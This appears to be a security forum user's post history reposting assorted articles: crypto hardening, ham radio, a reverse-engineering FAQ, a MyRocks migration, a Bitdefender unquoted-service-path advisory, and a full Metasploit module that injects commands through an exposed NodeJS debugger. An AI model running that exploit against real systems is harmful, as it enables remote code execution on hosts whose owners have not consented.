-
Posts
18725 -
Joined
-
Last visited
-
Days Won
707
Everything posted by Nytro
-
Cracking the Lens: Targeting HTTP's Hidden Attack Surface
Nytro replied to Nytro's topic in Securitate web
Da, il am printat, o sa il citesc si eu zilele astea, pare interesant. -
Titlu https://9gag.com/gag/aMAzNp6
-
Can’t you download from the Softpedia source?
-
Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Alexander Würstlein, Aaron Zauner, Pepi Zawodsky (University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at) Abstract “Unfortunately, the computer security and cryptology communities have drifted apart over the last 25 years. Security people don’t always understand the available crypto tools, and crypto people don’t always understand the real-world problems.” — Ross Anderson in [And08] This guide arose out of the need for system administrators to have an updated, solid, well researched and thought-through guide for configuring SSL, PGP, SSH and other cryptographic tools in the post-Snowden age. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings. This guide is specifically written for these system administrators. As Schneier noted in [Sch13a], it seems that intelligence agencies and adversaries on the Internet are not breaking so much the mathematics of encryption per se, but rather use software and hardware weaknesses, subvert standardization processes, plant backdoors, rig random number generators and most of all exploit careless settings in server configurations and encryption systems to listen in on private communications. Worst of all, most communication on the internet is not encrypted at all by default (for SMTP, opportunistic TLS would be a solution). This guide can only address one aspect of securing our information systems: getting the crypto settings right to the best of the authors’ current knowledge. Other attacks, as the above mentioned, require different protection schemes which are not covered in this guide. This guide is not an introduction to cryptography. For background information on cryptography and cryptoanalysis we would like to refer the reader to the references in appendix B and C at the end of this document. The focus of this guide is merely to give current best practices for configuring complex cipher suites and related parameters in a copy & paste-able manner. The guide tries to stay as concise as is possible for such a complex topic as cryptography. Naturally, it can not be complete. There are many excellent guides [IS12, fSidIB13, ENI13] and best practice documents available when it comes to cryptography. However none of them focuses specifically on what an average system administrator needs for hardening his or her systems’ crypto settings. This guide tries to fill this gap. Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf
-
- 1
-
-
Oare se va ajunge la asta? http://www.imdb.com/title/tt0181689/ Pe de alta parte, acest viitor e mai plauzibil: http://www.imdb.com/title/tt0387808/
-
Super, mai lipseste "3D Penis Recognition".
-
Ham Radio for Emergency Communications SEPTEMBER 26, 2017 | MARK WAGGONER Get the latest security news in your inbox. Why have an article on Ham Radio on an InfoSec blog? As IT/IS professionals we tend to be some of the most “connected” people in society. We usually have several communication devices within arms reach at any time, and rely on them to constantly update and alert us. Though many of us even work directly with infrastructure, we tend to take it for granted. I’m sure many of us cringe when we have a brief outage - it may wreck your 99.99% uptime. But, what do you do when all that underlying infrastructure is gone, or at least not operational? How do you communicate when you have no internet or cell service? The recent hurricanes have brought this possibility home for a large number of people. Amateur Radio, commonly referred to as Ham Radio, has some answers for this type of dilemma. I’m sure some of you are thinking of an old guy in a shack with some huge, vacuum tube radio and a giant tower with antennas on it. Well, there are some of those around, but there is far more to Amateur Radio, particularly when it comes to Emergency Communications (EMCOM). Let’s start with a quick overview of the Amateur Radio Service. Ham Radio is a huge hobby with considerable width and breadth, as such, I’m going to use lots of generalization and gross simplification. But it starts with passing an exam and being licensed by the FCC. Exams must be taken in person and on paper generally. The American Radio Relay League has a list of exam providers and locations. The exams are based on a published question pool and the fee for the exam is between free and $15. There are three levels of licensing: Technician, General,and Extra that grant the ability to use different allocations of the radio spectrum. The exams are not difficult, they are multiple choice and there are lots of study resources available, including mobile apps. There is no requirement to send Morse Code anymore! Once you pass your test, you do have to wait a few days to get your license and callsign, these are published on the FCC’s website; my entry is here. The Technician license gives you access to Ham Radio Bands in the VHF/UHF range (30mhz - 10ghz). Radio waves in this range are generally line of sight (LoS). You must have an unobstructed path between your transmitter and the receiver at the destination. This is what you have probably experienced with GMRS/FRS radios (which are UHF). In order to extend the range and usefulness of LoS communications, repeaters placed in elevated locations are used. This can be extended even further with the use of linked repeaters. Repeaters do exactly what their name sounds like, they receive your signal and then re-broadcast it. As licensed operators, we also have the ability to use far more power (up to 1500 watts) than the GMRS/FRS radios (about 1 watt). Systems based on these frequency ranges are used for local communications, generally within a metro area. The General license type gives you access to the HF bands (1mhz - 29mhz). In this frequency range the radio waves travel by skywave instead of LoS. This allows you to potentially talk around the world by bouncing radio waves off of the ionosphere. The distance and direction of your communications are heavily dependent on the condition of the ionosphere. Things that affect the ionosphere: Day vs. night, sunspots, solar flares, solar storms. Check out some space weather reports. The Extra license adds some small allocations within the same bands the General has access to. Local For many people, the ability to get in touch with loved ones in their local area after a disaster is their primary concern. Close behind that is getting information on what is going on, what the response to the disaster is. These needs can be addressed with a Technician’s license and equipment that can only operate in the VHF/UHF bands. Most metro areas have linked repeaters systems that are hardened for EMCOM use. This includes a backup power source like a generator with days/weeks worth of fuel or a solar/battery system. During an emergency, traffic on these repeaters may be restricted at times so that your local ARES/RACES organization may be using them for official traffic in response to the disaster. Listening in can give you valuable information about what is going on with relief efforts. In order to be able to take advantage of these systems you are going to need a few things: Radio Power supply Antenna Frequencies Radios for these bands come in two form factors, the handheld HT (Handy Talkie in Ham Radio jargon), and the mobile form factor, about the size of a car stereo. These are usually single mode, FM radios, that are either single or multi-band. Most new Ham’s these days seem to start off with something like the Baofeng UV-5R, for around $20. But, you get what you pay for. Something like the Yaesu FT-60 would probably be a better HT to start out with, at around $150. Handhelds range all the way up to around $600 for the Kenwood TH-D74, which is serious overkill for most people starting out. One of the advantages of handhelds is that they are self-contained (radio, battery, antenna). The disadvantage is that they are low powered (4-8watts typically). My Ham Radio setup, pretty basic but it works. Yaesu FT-817, TyT 9000, BaoFeng UV-82HP, TyT MD-380 Mobile radios are often used as desktop radios as well as mobile. They are generally also single mode and either single or multi-band. These range from cheap Chinese radios (about $100), to high end Japanese ones ($600+). With these radios you will also need an antenna and a 12v power supply. The antenna could span from an outdoor one on a mast, to a mobile antenna mounted in your home, to a roll up style portable antenna. Power supply can be handled by either a purpose built unit, or a suitable battery and charger. The advantage to a mobile setup at home is greater power (40-80 watts), disadvantage for EMCOM is they use more power. While it is certainly possible to use a scanner or SDR (Software Defined Radio) to hunt for frequencies in use in your local area, it is far easier to start with a list you can program into your radio. Sites like www.radioreference.com help with finding local frequencies, also joining a local club can help (I belong to www.papasys.com here in Los Angeles). Please, do not make the mistake of thinking you can buy all this stuff and tuck it away until you need it. It takes practice and experience to effectively communicate with radios and troubleshoot issues. Long Distance Long distance communications via Ham radio is the realm of the HF (High Frequency) bands. Amateurs often use the approximate length of one wave as shorthand to refer to each band. The radios referenced above typically operate on 2m and 70cm bands. HF radios are capable of operating on bands between 160m to 10m. Why I bring this up is that the size of the antenna needed is directly related to the wavelength. Most antennas are either ½ or ¼ wavelength in order to be resonant. So, while a ½ wave antenna for a 2m radio is only about 3 feet long, one for the 40m band is 70 feet long. This can be a serious limiting factor for your use of these bands. There are compromised antennas that are much smaller, but they compromise efficiency for size. The list of requirements for HF EMCOM use is the same as for VHF/UHF: Radio Power supply Antenna Frequencies Radio’s that cover the HF bands are generally much more expensive that for the higher bands. For effective use in an emergency situation, you would probably want a radio that can put out up to 100 watts. Lower power, and price, radios exist, but are not as effective. About the lowest buy in for a new HF rig is about $470 for the Alinco DX-SR8T. At the high end, the cost is $3000 -6,000 for something like the Elecraft K3S. The closest thing to “One Radio to Rule Them All” is the Yaesu FT857D, at around $850. This covers almost all of the bands available and is a solid overall radio. Power supplies are pretty much the same as for VHF radios, you just need to take into consideration power use. A 100 watt radio is going to burn through more amp hours of battery quicker than a 40 watt radio. Solar generators are ideal for getting through multiple days without mains power. Antennas can range from simple wire dipoles, to massive beam antennas, to compact magnetic loop antennas. Frequencies will vary between day (usually 20m band) and night (usually 40m) and from event to event. HF requires practice and experience even more than VHF/UHF. There are so many factors that influence communication on these bands that there is almost no way you could be effective without a considerable amount of hands on experience. Conclusion This is a very brief overview that barely scratches the surface of EMCOM and the Amateur Radio / Ham Radio hobby. I hope that this at least gives a good starting point for people who are interested in communications. Below is a list of further resources by people with far more experience and knowledge than myself if you want to dive deeper into this subject. Links www.hamradio360.com - website and podcasts that cover the full breadth of the hobby in a very accessible way. www.survivaltechnology.net - blog and YouTube channel covering HF emergency and survival communications. www.aredn.org - Amateur radio mesh networking Follow me on Twitter! Sursa: https://www.alienvault.com/blogs/security-essentials/ham-radio-for-emergency-communications
- 1 reply
-
- 2
-
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n" def initialize(info={}) super(update_info(info, 'Name' => "NodeJS Debugger Command Injection", 'Description' => %q{ This module uses the "evaluate" request type of the NodeJS V8 debugger protocol (version 1) to evaluate arbitrary JS and call out to other system commands. The port (default 5858) is not exposed non-locally in default configurations, but may be exposed either intentionally or via misconfiguration. }, 'License' => MSF_LICENSE, 'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ], 'References' => [ [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ], [ 'URL', 'https://github.com/nodejs/node/pull/8106' ] ], 'Targets' => [ ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ], ], 'Privileged' => false, 'DisclosureDate' => "Aug 15 2016", 'DefaultTarget' => 0) ) register_options( [ Opt::RPORT(5858) ]) end def make_eval_message msg_body = { seq: 1, type: 'request', command: 'evaluate', arguments: { expression: payload.encoded, global: true, maxStringLength:-1 } }.to_json msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length} msg_header + msg_body end def check connect res = sock.get_once disconnect if res.include? "V8-Version" and res.include? "Protocol-Version: 1" vprint_status("Got debugger handshake:\n#{res}") return Exploit::CheckCode::Appears end Exploit::CheckCode::Unknown end def exploit connect # must consume incoming handshake before sending payload buf = sock.get_once msg = make_eval_message print_status("Sending #{msg.length} byte payload...") vprint_status("#{msg}") sock.put(msg) buf = sock.get_once if buf.include? '"command":"evaluate","success":true' print_status("Got success response") elsif buf.include? '"command":"evaluate","success":false' print_error("Got failure response: #{buf}") else print_error("Got unexpected response: #{buf}") end end end Sursa: https://www.exploit-db.com/exploits/42793/
-
Description: Bitdefender Total Security suffers from an unquoted service path vulnerability, which could allow an attacker to execute arbitrary code on a target system.If the executable is enclosed in quote tags “” then the system will know where to find it. However if the path of where the application binary is located doesn’t contain any quotes then Windows will try to find it and execute it inside every folder of this path until they reach the executable. PDF: https://secur1tyadvisory.files.wordpress.com/2017/09/bitdefender-total-security-2017-unquoted-service-path-vulnerability_sachin_waghtiger_tigerboy.pdf
-
- 1
-
-
2017-09-24: FAQ: How to learn reverse-engineering? faq Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to learn reverse-engineering? Q: Could you recommend any resources for learning reverse-engineering? A: For the sake of this blog post I'll assume that the question is about reverse code engineering (RE for short), as I don't know anything about reverse hardware/chip engineering. My answer is also going to be pretty high-level, but I'll assume that the main subject of interest is x86 as that is the architecture one usually starts with. Please also note that this is not a reverse-engineering tutorial - it's a set of tips that are supposed to hint you what to learn first. I'll start by noting two crucial things: 1. RE is best learnt by practice. One does not learn RE by reading about it or watching tutorials - these are valuable additions and allow you to pick up tricks, tools and the general workflow, but should not be the core of any learning process. 2. RE takes time. A lot of time. Please prepare yourself for reverse-engineering sessions which will takes multiple (or even tens of) hours to finish. This is normal - don't be afraid to dedicate the required time. While reverse-engineering a given target one usually uses a combination of three means: • Analysis of the dead-listing - i.e. analyzing the result of the disassembly of a binary file, commonly known as static analysis. • Debugging the live target - i.e. using a debugger on a running process, commonly known as dynamic analysis. • Behavioral analysis - i.e. using high-level tools to get selected signals on what the process is doing; examples might be strace or Process Monitor. Given the above, a high-level advice would be to learn a mix of the means listed above while working through a series of reverse-engineering challenges (e.g. crackmes or CTF RE tasks1). 1 While reversing a crackme/CTF task is slightly different than a normal application, the former will teach you a lot of anti-RE tricks you might find and how to deal with them. Normal applications however are usually larger and it's easier to get lost in the huge code base at the beginning. Below, in sections detailing the techniques mentioned above, I've listed resources and tools that one might want to get familiar with when just starting. Please note that these are just examples and other (similar) tools might be better suited for a given person - I encourage you to experiment with different programs and see what you like best. Analysis of the dead-listing Time to call out the elephant in the room - yes, you will have to learn x86 assembly. There isn't a specific tutorial or course I would recommend (please check out the comment section though), however I would suggest starting with 64-bit or 32-bit x86 assembly. Do not start with 16-bit DOS/real-mode stuff - things are different in 64-/32-bit modes (plus 64-/32-bit modes are easier in user-land2) and 16-bit is not used almost anywhere in modern applications. Of course if you are curious about the old times and care about things like DOS or BIOS, then by all means, learn 16-bit assembly at some point - just not as the first variation. 2 16-bit assembly has a really weird addressing mode which has been replaced in 64-/32-bit mode with a different, more intuitive model; another change is related to increasing the number of possible address encodings in opcodes, which make things easier when writing assembly. When learning assembly try two things: • See how your C/C++ compiler translates high-level code into assembly. While almost all compilers have an option to generate output in assembly (instead of machine code wrapped in object files), I would like to recommend the Compiler Explorer (aka godbolt.org) project for this purpose - it's an easy to use online service that automates this process. • Try writing some assembly code from scratch. It might be a pain to find a tutorial / book for your architecture + operating system + assembler (i.e. assembly compiler) of choice3 and later to actually compile and link the created code, but it's a skill one needs to learn. Once successfully completed the exercise with one set of tools, try the same with a different assembler/linker (assembly dialects vary a little, or a little more if we point at Intel vs AT&T syntax issue - try to get familiar with such small variations to not get surprised by them). I would recommend trying out the following combinations: • Linux 32-/64-bits and GNU Assembler (Intel, AT&T, or both), • Windows 32-/64-bits and fasm, • Linux 32-/64-bits and nasm + GCC. 3 A common mistake is to try to learn assembly from e.g. a 16-bit + DOS + tasm tutorial while using e.g. 32-bit + Linux + nasm - this just won't work. Be sure that you use a tutorial matched to your architecture + operating system + assembler (these three things), otherwise you'll run into unexpected problems. One thing to remember while learning assembly is that it's a really really simple language on syntax level, but the complexity comes with having to remember various implicit details related to the ABI (Application Binary Interface), the OS and the architecture. Assembly is actually pretty easy once you get the general idea, so don't be scared by it. A couple of supporting links: • The Complete Pentium Instruction Set Table (32 Bit Addressing Mode Only) by Sang Cho - a cheatsheet of 32-bit x86 instructions and their machine-code encoding; really handy at times. • Intel® 64 and IA-32 Architectures Software Developer Manuals - Volume 2 (detailed description of the instructions) is something you want to keep close and learn how to use it really well. I would recommend going through Volume 1 when learning, and Volume 3 at intermediate/advance level. • AMD's Developer Guides, Manuals & ISA Documents - similar manuals, but from AMD; some people prefere these. • [Please look in the comment section for any additional links recommended by others.] One way of learning assembly I didn't mention so far, but which is really obvious in the context of this post, is learning by reading it, i.e. by reverse engineering code4. 4 Do remember however that reading the code will not teach you how to write it. These are related but still separate skills. Please also note that in order to be able to modify the behavior of an application you do have to be able to write small assembly snippets (i.e. patches). To do that one usually needs a disassembler, ideally an interactive one (that allows you to comment, modify the annotations, display the code in graph form, etc): • Most professionals use IDA Pro, a rather expensive but powerful interactive disassembler, that has a free version (for non-commercial use) that's pretty limited, but works just fine for 32-bit Windows targets. • The new player on the market is Binary Ninja, which is much cheaper, but still might be on the expensive side for hobbyists. • Another one is called Hopper, though it's available only for Linux and macOS. • There is also an open source solution in the form of radare2 - it's pretty powerful and free, but has the usual UX problems of open-source software (i.e. the learning curve for the tool itself is much steeper). • If all else fails, one can always default to non-interactive disassembler such as objdump from GNU binutils that supports architectures that even IDA doesn't (note that in such case you can always save the output in a text file and then add comments there - this is also a good fallback when IDA/BN/etc don't support a given architecture of interest). Having the tool of choice installed and already knowing some assembly it's good to just jump straight into reverse-engineering of small and simple targets. A good exercise is to write a program in C/C++ and compile it, and then just having the disassembler output trying to reverse it into a high-level representation, and finally into proper C/C++ code (see the illustration below). Once you get a hang of this process you should also be able to skip it altogether and still be able to understand what a given function does just after analyzing it and putting some comments here and there (keep in mind that this does take some practice). One important thing I have not yet mentioned is that being able to reverse a given function only gives you a low-level per-function view of the application. Usually to understand an application you need to first find which functions is it worth to analyze at all. For example, you probably don't want to get sidetracked by spending a few hours reversing a set of related functions just to find out they are actually the implementation of malloc or std::cout (well, you'll reverse your share of these anyway while learning, that's just how it is). There are a few tips I can give you here: • Find the main function and start the analysis from there. • Look at the strings and imported functions; find where they are used and go up the call-stack from there. • More advance reversers also like to do trace diffing in case of larger apps, though this FAQ isn't a place to discuss this technique. Debugging the live target Needless to say that a debugger is a pretty important tool - it allows you to stop execution of a process at any given point and analyze the memory state, the registers and the general process environment - these elements provide valuable hints towards the understanding the code you're looking at. For example, it's much easier to understand what a function does if you can pause its execution at any given moment and take a look what exactly does the state consist of; sometimes you can just take an educated guess (see also the illustration below). Of course the assembly language mentioned in the previous section comes into play here as well - one of the main views of a debugger is the instruction list nearby the instruction pointer. There is a pretty good choice of assembly-level debuggers out there, though most of them are for Windows for some reason5: • x64dbg - an open-source Windows debugger similar in UX to the classic OllyDbg. This would be my recommendation for the first steps in RE; you can find it here. • Microsoft WinDbg - a free and very powerful user-land and kernel-land debugger for Windows made by Microsoft. The learning curve is pretty steep as it's basically a command-line tool with only some features available as separate UI widgets. It's available as part of Windows SDK. On a sidenote, honorary_bot did a series of livestreams about WinDbg - it was in context of kernel debugging, but you still can pick up some basics there (1, 2, 3, 4; at first start with the 2nd part). • GDB - the GNU Debugger is a powerful open-source command-line tool, which does require you to memorize a set of commands in order to be able to use it. That said, there are a couple of scripts that make life easier, e.g. pwndbg. You can find GDB for both Linux and Windows (e.g. as part of MinGW-w64 packet), and other platforms; this includes non-x86 architectures. • [Some interactive disassemblers also have debugging capabilities.] • [Do check out the comment section for other recommendations.] 5 The reason is pretty obvious - Windows is the most popular closed-source platform, therefore Windows branch of reverse-engineering is the most developed one. The basic step after installing a debugger is getting to know it, therefore I would recommend: • walking through the UI with a tutorial, • and also seeing how someone familiar with the debugger is using it. YouTube and similar sites seem to be a good starting point to look for these. After spending some time getting familiar with the debugger and attempting to solve a couple of crackmes I would recommend learning how a debugger works internally, initially focussing on the different forms of breakpoints and how are they technically implemented (e.g. software breakpoints, hardware breakpoints, memory breakpoints, and so on). This gives you the basis to understand how certain anti-RE tricks work and how to bypass them. Further learning milestones include getting familiar with various debugger plugins and also learning how to use a scripting language to automate tasks (writing ad-hoc scripts is a useful skill). Behavioral analysis The last group of methods is related to monitoring how a given target interacts with the environment - mainly the operating system and various resources like files, sockets, pipes, register and so on. This gives you high-level information on what to expect from the application, and at times also some lower-level hints (e.g. instruction pointer when a given event happened or a call stack). At start I would recommend taking a look at the following tools: • Process Monitor is a free Windows application that allows you to monitor system-wide (with a convenient filtering options) access to files, register, network, as well as process-related events. • Process Hacker and Process Explorer are two free replacements for Windows' Task Manager - both offer more details information about a running process though. • Wireshark is a cross-platform network sniffer - pretty handy when reversing a network-oriented target. You might also want to check out Message Analyzer for Windows. • strace is a Linux tool for monitoring syscall access of a given process (or tree of processes). It's extremely useful at times. • ltrace is similar to strace, however it monitors dynamic library calls instead of syscalls. • [On Windows you might also want to search for a "WinAPI monitor", i.e. a similar tool to ltrace (I'm not sure which tool to recommend here though).] • [Some sandboxing tools for Windows also might give you behavioural logs for an application (but again, I'm not sure which tool to recommend).] • [Do check out the comment section for other recommendations.] The list above barely scratches the surface of existing monitoring tools. A good habit to have is to search if a monitoring tool exists for the given resource you want to monitor. Other useful resources and closing words As I mentioned at the beginning, this post is only supposed to get you started, therefore everything mentioned above is just the tip of the proverbial iceberg (though now you should at least know where the iceberg is located). Needless to say that there are countless things I have not mentioned here, e.g. the whole executable packing/unpacking problems and other anti-RE & anti-anti-RE struggles, etc. But you'll meet them soon enough. The rest of this section contains various a list of books, links and other resources that might be helpful (but please please keep in mind that in context of RE the most important thing is almost always actually applying the knowledge and almost never just reading about it). Let's start with books: • Reverse Engineering for Beginners (2017) by Dennis Yurichev (CC BY-SA 4.0, so yes, it's free and open) • Practical Malware Analysis (2012) by Michael Sikorski and Andrew Honig • Practical Reverse Engineering (2014) by Bruce Dang, Alexandre Gazet, Elias Bachaalany, Sebastien Josse • [Do check out the comment section for other recommendations.] There are of course more books on the topic, some of which I learnt from, but time has passed and things have changed, so while the books still contain valuable information some of it might be outdated or targeting deprecated tools and environments/architectures. Nonetheless I'll list a couple here just in case someone interested in historic RE stumbles upon this post: • Hacker Disassembling Uncovered (2003) by Kris Kaspersky (note: first edition of this book was made available for free by the author, however the links no longer work) • Reversing: Secrets of Reverse Engineering (2005) by Eldad Eilam • [Do check out the comment section for other recommendations.] Some other resources that you might find useful: • Tuts 4 You - a large website dedicated to reverse-engineering. I would especially like to point out the Downloads section which, among other things, contains tutorials, papers and CrackMe challenges (you can find the famous crackmes.de archive there too). • /r/ReverseEngineering - reddit has a well maintained section with news from the RE industry. • Reverse Engineering at StackExchange - in case you want to skim through commonly asked questions or ask your own. • PE Format - Windows executable file format - it's pretty useful to be familiar with it when working on this OS. • Executable and Linkable Format (ELF) - Linux executable file format (see note above). • Ange Albertini's executable format posters (among many other things) - analyzing Ange's PE and ELF posters greatly simplifies the learning process for these formats. • [Do check out the comment section for other recommendations.] I'll add a few more links to my creations, in case someone finds it useful: • Practical RE tips (1.5h lecture) • You might also find some reverse-engineering action as part of my weekly livestreams. An archive can be found on my YouTube channel. Good luck! And most of all, have fun! Sursa: http://gynvael.coldwind.pl/?id=664
-
- 5
-
-
-
Migrating a database from InnoDB to MyRocks Yoshinori Matsunobu Last year, we introduced MyRocks, our new MySQL database engine, with the goal of improving space and write efficiency beyond what was possible with compressed InnoDB. Our objective was to migrate one of our main databases (UDB) from compressed InnoDB to MyRocks and reduce the amount of storage and number of servers used by half. We carefully planned and implemented the migration from InnoDB to MyRocks for our UDB tier, which manages data about Facebook’s social graph. We completed the migration last month, and successfully cut our storage usage in half. This post describes how we prepared for and executed the migration, and what lessons we learned along the way. UDB was space-bound Several years ago, we changed the UDB hardware from Flashcache to pure Flash, which addressed some performance issues. MySQL with InnoDB was fast and reliable, but we wanted to be more efficient by using less hardware to support the same workload and data. With pure Flash, UDB was space-bound. Even though we used InnoDB compression and there was excess CPU and random I/O capacity, it was unlikely that we could enhance InnoDB to use less space. Fig 1: InnoDB was space-bound and CPU/IO were idle. This is common with Flash. This was one of the motivations for creating MyRocks – a RocksDB storage engine for MySQL. We implemented several features to match InnoDB where the database size was much bigger than RAM, including: Clustered index Transaction (Atomicity, Row locks, MVCC, Repeatable Read/Read Committed, 2PC across binlog and RocksDB) Crash-safe slave/master SingleDelete (Efficient deletions for secondary indexes) Fast data loading, fast index creation, and fast drop table Our early experiments showed that space usage with MyRocks was cut in half compared with compressed InnoDB, without significantly increasing CPU and I/O utilization. So we decided to fully migrate UDB from InnoDB to MyRocks. Fig 2: Estimated workloads in MyRocks, with 2x density. There is still CPU/IO capacity. Easier migration from InnoDB to MyRocks Database migration can be challenging for user-facing database services. In general, production OLTP database migration has to be done without stopping services, without degrading latency/throughput, without returning wrong data, and without affecting operations. MyRocks has a unique advantage compared with other database technologies – it’s also in MySQL, so the similarities make it much easier to migrate from InnoDB. For example: No application change was needed because MySQL client protocols and schema definitions were the same. (There were actually some minor differences, like Gap Lock, but they were relatively easy to address.) Our existing MySQL administration tools could support both InnoDB and MyRocks. MyRocks could replicate from InnoDB. We could add a MyRocks instance by running as one of the read-only slaves. InnoDB could also replicate from MyRocks. We could deploy MyRocks on master without destroying InnoDB. This allowed us to demote MyRocks and promote InnoDB again if an issue arose in production. Binary logs with Global Transaction Identifier (GTID) made it possible to verify data consistency between InnoDB and MyRocks instances, without stopping replication for a long time (less than 1 second). Data consistency verification MyRocks/RocksDB was a newer database, so we helped prevent introducing new bugs into our database with a comprehensive data consistency verification. The verification has run continuously — both during migration and after running in production. Primary key and secondary key consistency check. This compared row counts and column checksum between the primary and secondary keys of the same MyRocks tables. For example, if there was a column (id, value1, value2) for table t1 and there was a secondary index for (value1), the tool scanned value1 by primary key and secondary key, then compared row counts and checksum. If either the primary key or secondary key was corrupted, checksum wouldn't match. Consistency check across two instances. This compared primary key row counts and checksum across two different instances (MyRocks and InnoDB) within the same replicaset (master-slave pairs). With GTID, it is possible to start transactions with consistent snapshot with the same GTID, for both instances. Then select statements that follow (returning row counts and checksum) should be consistent between instances. Shadow query correctness check across two instances. MySQL has a feature called Audit Plugin to capture executed queries. We created a tool to shadow (replay) captured queries to multiple instances and compare results. This made sure that production queries were seeing exactly the same results between InnoDB and MyRocks. Migration steps We used the following process to migrate from InnoDB to MyRocks. The fact that InnoDB and MyRocks could replicate each other made the migration a lot easier. Deployed the first MyRocks slave. We had one master and four slaves for each replicaset, across worldwide regions. For each replicaset, we created a first MyRocks instance by dumping from InnoDB (mysqldump) in the same region, then loading into MyRocks (mysql with bulk data loading and fast index creation). We stopped replication in the source InnoDB slave instances during dump and load to make migration fast and easier. During dump and load, all read requests went to other available slave InnoDB instances. Since MyRocks was optimized for data loading and secondary index creations, dump and load did not take much time (it could copy hundreds of GBs of InnoDB data per hour). After catching up replication and verifying consistency, we deleted the InnoDB in the same region. Deployed the second MyRocks slave. We wanted to avoid operating with a single MyRocks instance, since losing the MyRocks instance would require us to dump and load again. By operating with two MyRocks instances, recovering from single instance failure could be done by online binary MyRocks copy (myrocks_hotbackup), which was much more lightweight than dump and load. Prior to MyRocks deployment, we had five InnoDB instances per replica set. We added two MyRocks instances so far followed by deleting two InnoDB instances in the same region. This resulted in three InnoDB and two MyRocks instances for each replicaset. Since MyRocks was faster for data loading, loading into MyRocks was much easier than copying to InnoDB. This allowed us to migrate without increasing the number of physical servers in use, even during migration. Promoted MyRocks slave as a master. Deploying master was much more difficult than deploying slaves because a master instance can serve writes as well as reads. For example, on master, concurrent writes to the same rows happen so proper row lock handling should be implemented. Poor concurrency implementation will cause lots of errors and stalls. Copied MyRocks in all regions, deleted all InnoDB instances. The last step was copying MyRocks in all regions and removing InnoDB. Finally the replicaset was fully migrated from InnoDB to MyRocks. In production, we did the first two steps for all UDB replica sets. We then proceeded to the third step for many replica sets, then finally to the last step. Since master deployment was the hardest part, we did lots of testing before moving forward. We extended our shadow query testing tool to cover master traffic testing, so that we could fix any concurrency bugs before deploying master in production. Other technical tips While we used direct I/O in InnoDB, MyRocks/RocksDB had limited support for direct I/O so we switched to use buffered I/O. Older Linux kernel had known issues that involved heavy buffered I/O usage causing swap and virtual memory allocation stalls. Our Linux kernel team at Facebook fixed the vm allocation stalls in Linux 4.6, and we upgraded the kernel to v4.6 prior to the migration. We also run multiple MySQL instances per machine. Each instance size was much smaller than the 5TB flash storage capacity, which helped improve database operations like backups, restore, creating replicas, and preventing replication lags. During migrations, we gradually created MyRocks instances, followed by deleting InnoDB instances. On Flash storage, aggressive file deletions caused long TRIM stalls, which might take seconds to tens of seconds. We were aware of the restrictions and created a simple tool to delete files slowly in tiny chunks. Instead of deleting 100GB InnoDB data files with the "rm" command, the tool divided large files into multiple ~64MB chunks, then deleted each chunk with short sleeps. We slowed down the deletion speed to around 128MB per second. Lessons learned Efficiency is important to our operations. Having completed the migration quickly and without causing production problems made us really happy. During the course of developing MyRocks and migrating to it, we learned several important lessons. Estimated migration time should be one of the main criteria in choosing hardware technology. For example, taking five years to complete a migration instead of one year can lower the impact on storage savings because you would have to continue to purchase new hardware before the migration was done. Automating and simplifying tests also helped make the migration easier, including: Sending shadow production read/write traffic and monitoring regressions (especially the number of errors, stalls and latency) Checking InnoDB and MyRocks data consistency Intentionally crashing MyRocks slave and master instances and verifying that they could recover Understand how the target service is used. It was important for us to decide what features to add in MyRocks with higher priority. We added several important features to migrate easier, such as detecting queries using Gap Locks, Bulk Loading, Read Committed isolation levels. Prioritizing features properly will help to migrate easier and quickly. But to do that, you need to know better about how services work. Start small. Ideally, new software should first be deployed on a very small, read-only instance, where it can be rolled back as needed. Switching an entire service via config file and hoping it will work is not what Production Engineers (Site Reliability Engineers) should do. MyRocks is an open source software, which allows us to work with others to create features and find and fix bugs. Future plans Replacing InnoDB with MyRocks in our main database helped us reduce our storage usage by half. We are continuing to make MyRocks and RocksDB more efficient, including consolidating instances more aggressively to free up machines for other purposes. We are also working on cross-engine support. MyRocks is optimized for space savings and reducing write amplification, while InnoDB is more optimized for reads and has more niche features such as gap locking, foreign keys, fulltext indexes, and spatial indexes. Our current MyRocks development does not implement many niche features but plans to support multiple engines reliably. Running both InnoDB and MyRocks in the same instance will allow people to use InnoDB for small, read-intensive tables, and MyRocks for everything else, which is a common feature request from our external community. Finally, we will work to support MyRocks for the upcoming MySQL 8.0. Sursa: https://code.facebook.com/posts/1478526992216557/migrating-a-database-from-innodb-to-myrocks/
-
